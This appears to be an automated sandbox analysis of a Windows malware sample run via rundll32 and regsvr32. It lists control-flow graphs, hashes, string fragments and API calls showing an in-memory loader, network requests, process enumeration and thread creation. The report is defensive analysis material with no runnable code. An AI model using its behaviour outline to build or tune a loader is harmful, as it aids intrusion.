                                                                                                                                      control_flow_graph 0 164c80a0000-164c80a0460 call 164c80a0aa8 * 2 VirtualAlloc 22 164c80a0462-164c80a0466 0->22 23 164c80a048a-164c80a0494 0->23 24 164c80a0468-164c80a0488 22->24 26 164c80a0a91-164c80a0aa6 23->26 27 164c80a049a-164c80a049e 23->27 24->23 24->24 27->26 28 164c80a04a4-164c80a04a8 27->28 28->26 29 164c80a04ae-164c80a04b2 28->29 29->26 30 164c80a04b8-164c80a04bf 29->30 30->26 31 164c80a04c5-164c80a04d2 30->31 31->26 32 164c80a04d8-164c80a04e1 31->32 32->26 33 164c80a04e7-164c80a04f4 32->33 33->26 34 164c80a04fa-164c80a0507 33->34 35 164c80a0531-164c80a0567 GetNativeSystemInfo 34->35 36 164c80a0509-164c80a0511 34->36 35->26 38 164c80a056d-164c80a0589 VirtualAlloc 35->38 37 164c80a0513-164c80a0518 36->37 39 164c80a0521 37->39 40 164c80a051a-164c80a051f 37->40 41 164c80a05a0-164c80a05ac 38->41 42 164c80a058b-164c80a059e 38->42 43 164c80a0523-164c80a052f 39->43 40->43 44 164c80a05af-164c80a05b2 41->44 42->41 43->35 43->37 46 164c80a05c1-164c80a05db 44->46 47 164c80a05b4-164c80a05bf 44->47 48 164c80a05dd-164c80a05e2 46->48 49 164c80a061b-164c80a0622 46->49 47->44 50 164c80a05e4-164c80a05ea 48->50 51 164c80a06db-164c80a06e2 49->51 52 164c80a0628-164c80a062f 49->52 53 164c80a05ec-164c80a0609 50->53 54 164c80a060b-164c80a0619 50->54 56 164c80a0864-164c80a086b 51->56 57 164c80a06e8-164c80a06f9 51->57 52->51 55 164c80a0635-164c80a0642 52->55 53->53 53->54 54->49 54->50 55->51 60 164c80a0648-164c80a064f 55->60 58 164c80a0871-164c80a087f 56->58 59 164c80a0917-164c80a0929 56->59 61 164c80a0702-164c80a0705 57->61 64 164c80a090e-164c80a0911 58->64 62 164c80a092f-164c80a0937 59->62 63 164c80a0a07-164c80a0a1a 59->63 65 164c80a0654-164c80a0658 60->65 66 164c80a0707-164c80a070a 61->66 67 164c80a06fb-164c80a06ff 61->67 69 164c80a093b-164c80a093f 62->69 90 164c80a0a1c-164c80a0a27 63->90 91 164c80a0a40-164c80a0a4a 63->91 64->59 68 164c80a0884-164c80a08a9 64->68 70 164c80a06c0-164c80a06ca 65->70 71 164c80a070c-164c80a071d 66->71 72 164c80a0788-164c80a078e 66->72 67->61 96 164c80a0907-164c80a090c 68->96 97 164c80a08ab-164c80a08b1 68->97 76 164c80a09ec-164c80a09fa 69->76 77 164c80a0945-164c80a095a 69->77 74 164c80a06cc-164c80a06d2 70->74 75 164c80a065a-164c80a0669 70->75 73 164c80a0794-164c80a07a2 71->73 78 164c80a071f-164c80a0720 71->78 72->73 80 164c80a085d-164c80a085e 73->80 81 164c80a07a8 73->81 74->65 82 164c80a06d4-164c80a06d5 74->82 86 164c80a067a-164c80a067e 75->86 87 164c80a066b-164c80a0678 75->87 76->69 88 164c80a0a00-164c80a0a01 76->88 84 164c80a095c-164c80a095e 77->84 85 164c80a097b-164c80a097d 77->85 89 164c80a0722-164c80a0784 78->89 80->56 93 164c80a07ae-164c80a07d4 81->93 82->51 98 164c80a096e-164c80a0979 84->98 99 164c80a0960-164c80a096c 84->99 101 164c80a097f-164c80a0981 85->101 102 164c80a09a2-164c80a09a4 85->102 103 164c80a068c-164c80a0690 86->103 104 164c80a0680-164c80a068a 86->104 100 164c80a06bd-164c80a06be 87->100 88->63 89->89 105 164c80a0786 89->105 92 164c80a0a38-164c80a0a3e 90->92 94 164c80a0a4c-164c80a0a54 91->94 95 164c80a0a7b-164c80a0a8e 91->95 92->91 106 164c80a0a29-164c80a0a35 92->106 127 164c80a07d6-164c80a07d9 93->127 128 164c80a0835-164c80a0839 93->128 94->95 107 164c80a0a56-164c80a0a79 RtlAddFunctionTable 94->107 95->26 96->64 116 164c80a08b3-164c80a08b9 97->116 117 164c80a08bb-164c80a08c8 97->117 108 164c80a09be-164c80a09bf 98->108 99->108 100->70 109 164c80a0983-164c80a0987 101->109 110 164c80a0989-164c80a098b 101->110 114 164c80a09ac-164c80a09bb 102->114 115 164c80a09a6-164c80a09aa 102->115 112 164c80a0692-164c80a06a3 103->112 113 164c80a06a5-164c80a06a9 103->113 111 164c80a06b6-164c80a06ba 104->111 105->73 106->92 107->95 122 164c80a09c5-164c80a09cb 108->122 109->108 110->102 120 164c80a098d-164c80a098f 110->120 111->100 112->111 113->100 121 164c80a06ab-164c80a06b3 113->121 114->108 115->108 123 164c80a08ea-164c80a08fe 116->123 124 164c80a08d3-164c80a08e5 117->124 125 164c80a08ca-164c80a08d1 117->125 129 164c80a0991-164c80a0997 120->129 130 164c80a0999-164c80a09a0 120->130 121->111 131 164c80a09cd-164c80a09d3 122->131 132 164c80a09d9-164c80a09e9 VirtualProtect 122->132 123->96 138 164c80a0900-164c80a0905 123->138 124->123 125->124 125->125 134 164c80a07e3-164c80a07f0 127->134 135 164c80a07db-164c80a07e1 127->135 136 164c80a0844-164c80a0850 128->136 137 164c80a083b 128->137 129->108 130->122 131->132 132->76 140 164c80a07f2-164c80a07f9 134->140 141 164c80a07fb-164c80a080d 134->141 139 164c80a0812-164c80a082c 135->139 136->93 142 164c80a0856-164c80a0857 136->142 137->136 138->97 139->128 144 164c80a082e-164c80a0833 139->144 140->140 140->141 141->139 142->80 144->127
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.306793620.00000164C80A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000164C80A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_164c80a0000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                      • API String ID: 394283112-2517549848
                                                                                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction ID: 949152487d4c17a03b5fe82f36ce7fd01d4295cb0c1e29175ef44ea51660bf03
                                                                                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction Fuzzy Hash: 1472E23061AA4CCFEB69DF19C8857E9BBE0FB99314F11422DE88AC3251DB35D542CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:18.2%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:4.8%
                                                                                                                                      Total number of Nodes:83
                                                                                                                                      Total number of Limit Nodes:8
                                                                                                                                      execution_graph 3902 18001aca4 3907 18001ad22 3902->3907 3903 18001ba75 3907->3903 3908 180012b50 3907->3908 3911 18000a4fc 3907->3911 3914 18001cec4 3907->3914 3910 180012b8a 3908->3910 3909 180012bfb InternetOpenW 3909->3907 3910->3909 3913 18000a572 3911->3913 3912 18000a5f0 HttpOpenRequestW 3912->3907 3913->3912 3916 18001cf4a 3914->3916 3915 18001cfe2 InternetConnectW 3915->3907 3916->3915 3917 180015388 3920 1800227d4 3917->3920 3919 1800153e3 3924 18002281d 3920->3924 3922 180024315 3922->3919 3924->3922 3926 18001c05c 3924->3926 3930 18001c568 3924->3930 3937 180017908 3924->3937 3928 18001c0af 3926->3928 3929 18001c2e1 3928->3929 3941 18002ad58 3928->3941 3929->3924 3933 18001c58a 3930->3933 3932 18001c948 3932->3924 3933->3932 3948 180003598 3933->3948 3952 18000ac48 3933->3952 3956 180025dac 3933->3956 3960 1800097c0 3933->3960 3939 180017932 3937->3939 3938 180015e2c CreateThread 3938->3939 3939->3938 3940 180017bcd 3939->3940 3940->3924 3944 1800046a8 3941->3944 3943 18002ae38 3943->3928 3946 1800046ec 3944->3946 3945 180004982 3945->3943 3946->3945 3947 180004945 Process32FirstW 3946->3947 3947->3946 3950 180003640 3948->3950 3949 1800044c0 3949->3933 3950->3949 3964 18001ed50 3950->3964 3954 18000ac8e 3952->3954 3953 18000b5fe 3953->3933 3954->3953 3955 18001ed50 CreateFileW 3954->3955 3955->3954 3959 180025dde 3956->3959 3958 180026180 3958->3933 3959->3958 3971 180015e2c 3959->3971 3961 1800097fc 3960->3961 3962 18000981d 3961->3962 3963 18001ed50 CreateFileW 3961->3963 3962->3933 3963->3961 3966 18001ed7a 3964->3966 3967 18001f06b 3966->3967 3968 18000fb00 3966->3968 3967->3950 3970 18000fb80 3968->3970 3969 18000fc15 CreateFileW 3969->3966 3970->3969 3972 180015ea5 3971->3972 3973 180015f3b CreateThread 3972->3973 3973->3959 3974 d60000 3975 d60183 3974->3975 3976 d6043e VirtualAlloc 3975->3976 3980 d60462 3976->3980 3977 d60a7b 3978 d60531 GetNativeSystemInfo 3978->3977 3979 d6056d VirtualAlloc 3978->3979 3984 d6058b 3979->3984 3980->3977 3980->3978 3981 d60a00 3981->3977 3982 d60a56 RtlAddFunctionTable 3981->3982 3982->3977 3983 d609d9 VirtualProtect 3983->3984 3984->3981 3984->3983 3984->3984 3985 180015e2c 3986 180015ea5 3985->3986 3987 180015f3b CreateThread 3986->3987 3998 18001496c 4001 1800149ce 3998->4001 3999 1800152ba 4000 18000fb00 CreateFileW 4000->4001 4001->3999 4001->4000 3988 180024d80 3990 180024eed 3988->3990 3989 1800250bd 3990->3989 3992 180019a30 3990->3992 3993 180019aa4 3992->3993 3994 180019b2a GetVolumeInformationW 3993->3994 3994->3989 3995 18000fb00 3997 18000fb80 3995->3997 3996 18000fc15 CreateFileW 3997->3996

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 d60000-d60460 call d60aa8 * 2 VirtualAlloc 22 d60462-d60466 0->22 23 d6048a-d60494 0->23 24 d60468-d60488 22->24 26 d60a91-d60aa6 23->26 27 d6049a-d6049e 23->27 24->23 24->24 27->26 28 d604a4-d604a8 27->28 28->26 29 d604ae-d604b2 28->29 29->26 30 d604b8-d604bf 29->30 30->26 31 d604c5-d604d2 30->31 31->26 32 d604d8-d604e1 31->32 32->26 33 d604e7-d604f4 32->33 33->26 34 d604fa-d60507 33->34 35 d60531-d60567 GetNativeSystemInfo 34->35 36 d60509-d60511 34->36 35->26 38 d6056d-d60589 VirtualAlloc 35->38 37 d60513-d60518 36->37 39 d60521 37->39 40 d6051a-d6051f 37->40 41 d605a0-d605ac 38->41 42 d6058b-d6059e 38->42 43 d60523-d6052f 39->43 40->43 44 d605af-d605b2 41->44 42->41 43->35 43->37 46 d605b4-d605bf 44->46 47 d605c1-d605db 44->47 46->44 48 d605dd-d605e2 47->48 49 d6061b-d60622 47->49 52 d605e4-d605ea 48->52 50 d606db-d606e2 49->50 51 d60628-d6062f 49->51 56 d60864-d6086b 50->56 57 d606e8-d606f9 50->57 51->50 55 d60635-d60642 51->55 53 d605ec-d60609 52->53 54 d6060b-d60619 52->54 53->53 53->54 54->49 54->52 55->50 60 d60648-d6064f 55->60 58 d60917-d60929 56->58 59 d60871-d6087f 56->59 61 d60702-d60705 57->61 62 d60a07-d60a1a 58->62 63 d6092f-d60937 58->63 64 d6090e-d60911 59->64 65 d60654-d60658 60->65 66 d60707-d6070a 61->66 67 d606fb-d606ff 61->67 88 d60a40-d60a4a 62->88 89 d60a1c-d60a27 62->89 69 d6093b-d6093f 63->69 64->58 68 d60884-d608a9 64->68 70 d606c0-d606ca 65->70 71 d6070c-d6071d 66->71 72 d60788-d6078e 66->72 67->61 95 d60907-d6090c 68->95 96 d608ab-d608b1 68->96 75 d60945-d6095a 69->75 76 d609ec-d609fa 69->76 73 d606cc-d606d2 70->73 74 d6065a-d60669 70->74 77 d60794-d607a2 71->77 78 d6071f-d60720 71->78 72->77 73->65 80 d606d4-d606d5 73->80 84 d6067a-d6067e 74->84 85 d6066b-d60678 74->85 82 d6095c-d6095e 75->82 83 d6097b-d6097d 75->83 76->69 86 d60a00-d60a01 76->86 90 d6085d-d6085e 77->90 91 d607a8 77->91 87 d60722-d60784 78->87 80->50 97 d60960-d6096c 82->97 98 d6096e-d60979 82->98 100 d609a2-d609a4 83->100 101 d6097f-d60981 83->101 102 d60680-d6068a 84->102 103 d6068c-d60690 84->103 99 d606bd-d606be 85->99 86->62 87->87 104 d60786 87->104 93 d60a4c-d60a54 88->93 94 d60a7b-d60a8e 88->94 105 d60a38-d60a3e 89->105 90->56 92 d607ae-d607d4 91->92 126 d607d6-d607d9 92->126 127 d60835-d60839 92->127 93->94 107 d60a56-d60a79 RtlAddFunctionTable 93->107 94->26 95->64 116 d608b3-d608b9 96->116 117 d608bb-d608c8 96->117 108 d609be-d609bf 97->108 98->108 99->70 114 d609a6-d609aa 100->114 115 d609ac-d609bb 100->115 109 d60983-d60987 101->109 110 d60989-d6098b 101->110 111 d606b6-d606ba 102->111 112 d606a5-d606a9 103->112 113 d60692-d606a3 103->113 104->77 105->88 106 d60a29-d60a35 105->106 106->105 107->94 122 d609c5-d609cb 108->122 109->108 110->100 120 d6098d-d6098f 110->120 111->99 112->99 121 d606ab-d606b3 112->121 113->111 114->108 115->108 123 d608ea-d608fe 116->123 124 d608d3-d608e5 117->124 125 d608ca-d608d1 117->125 128 d60991-d60997 120->128 129 d60999-d609a0 120->129 121->111 130 d609cd-d609d3 122->130 131 d609d9-d609e9 VirtualProtect 122->131 123->95 142 d60900-d60905 123->142 124->123 125->124 125->125 133 d607e3-d607f0 126->133 134 d607db-d607e1 126->134 135 d60844-d60850 127->135 136 d6083b 127->136 128->108 129->122 130->131 131->76 139 d607f2-d607f9 133->139 140 d607fb-d6080d 133->140 138 d60812-d6082c 134->138 135->92 141 d60856-d60857 135->141 136->135 138->127 144 d6082e-d60833 138->144 139->139 139->140 140->138 141->90 142->96 144->126
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.790791208.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_d60000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                      • API String ID: 394283112-2517549848
                                                                                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction ID: 65f788e513154ff233090989534ea8f9ddaeb4268438c4995e09260bf5dccfb2
                                                                                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction Fuzzy Hash: DA72D630618B488FDB19DF58C8856BABBE1FB98305F14462EE8CBD7211DB34D946CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.791055548.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X$Ec;$J$^c$^c$n
                                                                                                                                      • API String ID: 0-2929744921
                                                                                                                                      • Opcode ID: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                                                                                      • Instruction ID: 2841c3f5e183e4376706155e5f630a85a86355917b0bfec54de2fd5c82beda78
                                                                                                                                      • Opcode Fuzzy Hash: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                                                                                      • Instruction Fuzzy Hash: DB0214705187C88BC798DFA8C48965EFBE1FB98744F108A1DF48687660DBF4D948CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 634 1800132f0-18001332a 635 18001332c-180013331 634->635 636 1800136a3 635->636 637 180013337-18001333c 635->637 638 1800136a8-1800136ad 636->638 639 180013342-180013347 637->639 640 1800135f0-18001368c call 180021434 637->640 638->635 641 1800136b3-1800136b6 638->641 639->638 643 18001334d-1800133c6 call 18001a754 639->643 647 180013691-180013697 640->647 645 180013759-180013760 641->645 646 1800136bc-180013757 call 180013e28 641->646 649 1800133cb-1800133d0 643->649 651 180013763-18001377d 645->651 646->651 647->641 648 180013699-18001369e 647->648 652 1800135e2-1800135eb 648->652 649->646 653 1800133d6-1800133db 649->653 652->635 653->641 655 1800133e1-1800133e6 653->655 655->652 656 1800133ec-1800134a8 call 180021434 655->656 656->641 659 1800134ae-1800135dc call 180016428 call 180013e28 656->659 659->641 659->652
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.791055548.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =_$F)k$b/$syG
                                                                                                                                      • API String ID: 0-3955183656
                                                                                                                                      • Opcode ID: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                                                                                      • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                      • Opcode Fuzzy Hash: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                                                                                      • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.791055548.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 5IF$P)#
                                                                                                                                      • API String ID: 0-1025399686
                                                                                                                                      • Opcode ID: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                                                                                      • Instruction ID: ff53fea05c8e9f3baddf865253a509f05c382ca6cc85a3c859ee45a04624b947
                                                                                                                                      • Opcode Fuzzy Hash: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                                                                                      • Instruction Fuzzy Hash: 0B9182711197889FCBA9DF18C8857DEB7E0FB88744F90561DF84A8B260C7B4DA49CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 584 18001cec4-18001cf6a call 1800142a0 587 18001cfe2-18001d01f InternetConnectW 584->587 588 18001cf6c-18001cfdc call 18000dd70 584->588 588->587
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.791055548.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConnectInternet
                                                                                                                                      • String ID: :G?$C
                                                                                                                                      • API String ID: 3050416762-1225920220
                                                                                                                                      • Opcode ID: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                                                                                      • Instruction ID: f2a8b8884ccc4c3404819a5ba5e10ed0cdd0f68caef2c301b3e7290f999a0a2a
                                                                                                                                      • Opcode Fuzzy Hash: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                                                                                      • Instruction Fuzzy Hash: 5941F67450CB888FD7A8DF18D0857AAB7E0FB98314F508A5EE8CDC7296DB749844CB46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.791055548.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFile
                                                                                                                                      • String ID: gF\
                                                                                                                                      • API String ID: 823142352-1982329323
                                                                                                                                      • Opcode ID: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                                                                                      • Instruction ID: 218d4d5182cb26b0f36475523bc21bdebfc34a2f4da3002633262ff40041eb9b
                                                                                                                                      • Opcode Fuzzy Hash: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                                                                                      • Instruction Fuzzy Hash: 1931697051C7848BD778DF28D48679ABBE0FB89304F10891EE88DC3352DB709885CB86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.791055548.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HttpOpenRequest
                                                                                                                                      • String ID: :G?
                                                                                                                                      • API String ID: 1984915467-1508054202
                                                                                                                                      • Opcode ID: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                                                                                      • Instruction ID: 60d2efcdc3634c8de813e735c521a1a1b2f1d3197bf379f764bafd55f5181dd8
                                                                                                                                      • Opcode Fuzzy Hash: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                                                                                      • Instruction Fuzzy Hash: 83314E7060CB848FDBA8DF18D08679BB7E0FB98315F50455DE88CC7296DB789944CB86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.791055548.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InternetOpen
                                                                                                                                      • String ID: :G?
                                                                                                                                      • API String ID: 2038078732-1508054202
                                                                                                                                      • Opcode ID: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                                                                                      • Instruction ID: c9298170b99e71c9961e7bb575de84f4b40d7dd1197e6373e1c7e5d4160ea6d3
                                                                                                                                      • Opcode Fuzzy Hash: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                                                                                      • Instruction Fuzzy Hash: 6F110A71518B888BD3A4DF64D48979BB7E1FB88319F50CA1DF4D9C6250DB788589CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.791055548.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                      • Opcode ID: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                                                                                      • Instruction ID: c545beb4aab352fd45c13a3c06d211153dc7cc573a2023b45670cfe369ebb01f
                                                                                                                                      • Opcode Fuzzy Hash: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                                                                                      • Instruction Fuzzy Hash: 0731F67061CB448FD7A8DF68D48579ABBE0FB88304F508A5EE88CD7356DB349944CB86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.791055548.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InformationVolume
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2039140958-0
                                                                                                                                      • Opcode ID: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                                                                                      • Instruction ID: 89e8e56e51c5a60af2ecd67268569f3ffacd31b875f751963744359e30ad4776
                                                                                                                                      • Opcode Fuzzy Hash: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                                                                                      • Instruction Fuzzy Hash: 2B31407051CB448FD7A8DF18D4C579AB7E0FB88315F60855EE88CC7255CB749948CB86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%